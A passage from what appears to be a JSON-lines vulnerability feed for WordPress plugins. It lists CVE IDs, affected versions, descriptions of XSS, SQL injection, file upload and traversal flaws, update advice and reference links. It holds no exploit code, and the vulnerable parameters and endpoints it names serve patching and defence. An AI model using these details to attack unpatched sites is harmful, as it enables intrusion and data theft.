\/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0891","slug":"stagtools","versionEndExcluding":"2.3.7","description":"The StagTools WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72397fee-9768-462b-933c-400181a5487c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72397fee-9768-462b-933c-400181a5487c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13796","slug":"post-grid","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The Post Grid and Gutenberg Blocks \u2013 ComboBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.6 via the \/wp-json\/post-grid\/v2\/get_users REST API. This makes it possible for unauthenticated attackers to extract sensitive data including emails and other user data.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/functions-rest.php?rev=3242718#L2055\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/trunk\\\/includes\\\/blocks\\\/functions-rest.php?rev=3242718#L2055\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245187%40post-grid&new=3245187%40post-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245187%40post-grid&new=3245187%40post-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0407223a-cd41-43d1-87b0-d6b83b57d4b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0407223a-cd41-43d1-87b0-d6b83b57d4b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4671","slug":"pixcodes","versionEndExcluding":"2.3.7","description":"The PixCodes WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14c83830-3207-4f92-b8f5-afd7cc93af88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14c83830-3207-4f92-b8f5-afd7cc93af88\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13320","slug":"woocommerce-multi-currency","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The CURCY - WooCommerce Multi Currency - Currency Switcher plugin for WordPress is vulnerable to SQL Injection via the 'wc_filter_price_meta[where]' parameter in all versions up to, and including, 2.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d359a5c-db11-416e-a329-c3ed67b1a925?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d359a5c-db11-416e-a329-c3ed67b1a925?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13816","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The Aiomatic - Automatic AI Content Writer & Editor, GPT-3 & GPT-4, ChatGPT ChatBot & AI Toolkit plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to missing capability checks on multiple functions in all versions up to, and including, 2.3.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete posts, list and delete batches, list assistant uploaded files, delete personas, delete forms, delete templates, and clear logs. The vulnerability was partially patched in version 2.3.5.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/#item-description__changelog\",\"name\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/#item-description__changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69de7d93-b255-4d41-8680-9762ff632804?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69de7d93-b255-4d41-8680-9762ff632804?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1745","slug":"testimonial-slider-and-showcase","versionImpact":"2.3.6","versionEndExcluding":"2.3.7","description":"The Testimonial Slider WordPress plugin before 2.3.7 does not properly ensure that a user has the necessary capabilities to edit certain sensitive plugin settings, making it possible for users with at least the Author role to edit them.","recommendation":"Update to version 2.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b63bbfeb-d6f7-4c33-8824-b86d64d3f598\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b63bbfeb-d6f7-4c33-8824-b86d64d3f598\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5314","slug":"3d-flipbook-dflip-lite","versionImpact":"2.3.65","versionEndExcluding":"2.3.67","description":"The Dear Flipbook \u2013 PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via the \u2018pdf-source\u2019 parameter in all versions up to, and including, 2.3.65 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.js#L8861\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.js#L8861\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/libs\\\/pdf.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/libs\\\/pdf.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319013\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319013\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e316c636-2dd7-4d50-8c99-36f08ecf03ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e316c636-2dd7-4d50-8c99-36f08ecf03ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6289","slug":"swift-performance-lite","versionImpact":"2.3.6.14","versionEndExcluding":"2.3.6.15","description":"The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.","recommendation":"Update to version 2.3.6.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c83dd57-9291-4dfc-846d-5ad47534e2ad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c83dd57-9291-4dfc-846d-5ad47534e2ad\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11387","slug":"easy-liveblogs","versionImpact":"2.3.5","versionEndExcluding":"2.3.6","description":"The Easy Liveblogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elb_liveblog' shortcode in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193445%40easy-liveblogs&new=3193445%40easy-liveblogs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193445%40easy-liveblogs&new=3193445%40easy-liveblogs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e721128-2e34-4717-8945-5fd25f2efd7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e721128-2e34-4717-8945-5fd25f2efd7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4657","slug":"menu-ordering-reservations","versionEndExcluding":"2.3.6","description":"The Restaurant Menu WordPress plugin before 2.3.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a90a413d-0e00-4da8-a339-d6cdfba70bb3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a90a413d-0e00-4da8-a339-d6cdfba70bb3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13798","slug":"post-grid","versionImpact":"2.3.5","versionEndExcluding":"2.3.6","description":"The Post Grid and Gutenberg Blocks \u2013 ComboBlocks plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 2.3.5. This is due to insufficient verification on form fields. This makes it possible for unauthenticated attackers to create new orders for products and mark them as paid without actually completing a payment.","recommendation":"Update to version 2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242737%40post-grid&new=3242737%40post-grid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242737%40post-grid&new=3242737%40post-grid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/705823ff-e9c3-4b8b-b71c-3b60d0d15b01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/705823ff-e9c3-4b8b-b71c-3b60d0d15b01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6423","slug":"beeteam368-extensions","versionImpact":"2.3.5","versionEndExcluding":"2.3.6","description":"The BeeTeam368 Extensions plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_submit_upload_file() function in all versions up to, and including, 2.3.5. This makes it possible for authenticated attackers with Subscriber-level access or higher to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187#item-description__change-log\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187#item-description__change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96170b82-6ed9-4a52-8592-944163cdd3cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96170b82-6ed9-4a52-8592-944163cdd3cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11830","slug":"3d-flipbook-dflip-lite","versionImpact":"2.3.52","versionEndExcluding":"2.3.53","description":"The PDF Flipbook, 3D Flipbook\u2014DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to 2.3.52 due to insufficient input sanitization and output escaping on user-supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215546%403d-flipbook-dflip-lite&new=3215546%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215546%403d-flipbook-dflip-lite&new=3215546%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218103%403d-flipbook-dflip-lite&new=3218103%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218103%403d-flipbook-dflip-lite&new=3218103%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88391d02-66d9-4c00-a519-17f92f64a17a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88391d02-66d9-4c00-a519-17f92f64a17a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"button-generation","versionEndExcluding":"2.3.5","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6381","slug":"beeteam368-extensions","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The BeeTeam368 Extensions plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.3.4 via the handle_remove_temp_file() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory. This vulnerability can be used to delete the wp-config.php file, which can be leveraged into a site takeover.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aed40456-43c3-4647-9bce-e7c6139c84cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aed40456-43c3-4647-9bce-e7c6139c84cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6379","slug":"beeteam368-extensions-pro","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The BeeTeam368 Extensions Pro plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.3.4 via the handle_live_fn() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform actions on files outside of the originally intended directory. This vulnerability can be used to delete the wp-config.php file, which can be leveraged into a site takeover.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/vidmov-video-wordpress-theme\\\/35542187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26abf509-f0a9-4849-9028-d6c42832158f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26abf509-f0a9-4849-9028-d6c42832158f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10107","slug":"simplr-registration-form","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"A vulnerability was found in Simplr Registration Form Plus+ Plugin up to 2.3.4 on WordPress and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.3.5 is able to address this issue. The name of the patch is d588446844dd49232ab400ef213ff5b92121c33e. It is recommended to upgrade the affected component. The identifier VDB-230153 was assigned to this vulnerability.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230153\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230153\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230153\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230153\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simplr-registration-form\\\/commit\\\/d588446844dd49232ab400ef213ff5b92121c33e\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/simplr-registration-form\\\/commit\\\/d588446844dd49232ab400ef213ff5b92121c33e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1452","slug":"favorites","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The Favorites WordPress plugin before 2.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47365daf-7ef5-471a-ab0e-f6d1b40ca56c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47365daf-7ef5-471a-ab0e-f6d1b40ca56c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3809","slug":"debug-log-manager","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The Debug Log Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the auto-refresh debug log in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267252%40debug-log-manager&new=3267252%40debug-log-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3267252%40debug-log-manager&new=3267252%40debug-log-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbc3210d-224e-4ed2-ada7-dc17deb17584?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbc3210d-224e-4ed2-ada7-dc17deb17584?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13541","slug":"adirectory","versionImpact":"2.3","versionEndExcluding":"2.3.5","description":"The aDirectory \u2013 WordPress Directory Listing Plugin plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the adqs_delete_listing() function in all versions up to, and including, 2.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.3.4\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.3.4\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.9.5\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/1.9.5\\\/inc\\\/Frontend\\\/Ajax.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/2.1\\\/inc\\\/Frontend\\\/Ajax.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adirectory\\\/tags\\\/2.1\\\/inc\\\/Frontend\\\/Ajax.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235167%40adirectory&new=3235167%40adirectory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235167%40adirectory&new=3235167%40adirectory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c99b8a94-c35b-43a1-bb14-2ca97be421cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c99b8a94-c35b-43a1-bb14-2ca97be421cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13659","slug":"listamester","versionImpact":"2.3.4","versionEndExcluding":"2.3.5","description":"The Listamester plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'listamester' shortcode in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listamester\\\/trunk\\\/includes\\\/class-listamester.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listamester\\\/trunk\\\/includes\\\/class-listamester.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225538%40listamester&new=3225538%40listamester&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225538%40listamester&new=3225538%40listamester&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68b4358d-d4b4-415b-a19f-e58b155ceac9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68b4358d-d4b4-415b-a19f-e58b155ceac9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2413","slug":"slide-anything","versionImpact":"2.3.46","versionEndExcluding":"2.3.47","description":"The Slide Anything WordPress plugin before 2.3.47 does not properly sanitize or escape the slide title before outputting it in the admin pages, allowing a logged in user with roles as low as Author to inject a javascript payload into the slide title even when the unfiltered_html capability is disabled.","recommendation":"Update to version 2.3.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e38b1bb-4410-45e3-87ca-d47a2cce9e22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e38b1bb-4410-45e3-87ca-d47a2cce9e22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8717","slug":"3d-flipbook-dflip-lite","versionImpact":"2.3.32","versionEndExcluding":"2.3.42","description":"The PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer \u2013 DearFlip plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'pdf_source' parameter in all versions up to, and including, 2.3.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4c2944-28e8-4866-b4da-91cf12d9d115?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d4c2944-28e8-4866-b4da-91cf12d9d115?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/assets\\\/js\\\/dflip.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172275\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172275\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3200","slug":"wpforo","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The wpForo Forum plugin for WordPress is vulnerable to SQL Injection via the 'slug' attribute of the 'wpforo' shortcode in all versions up to, and including, 2.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.3.4, or a newer patched 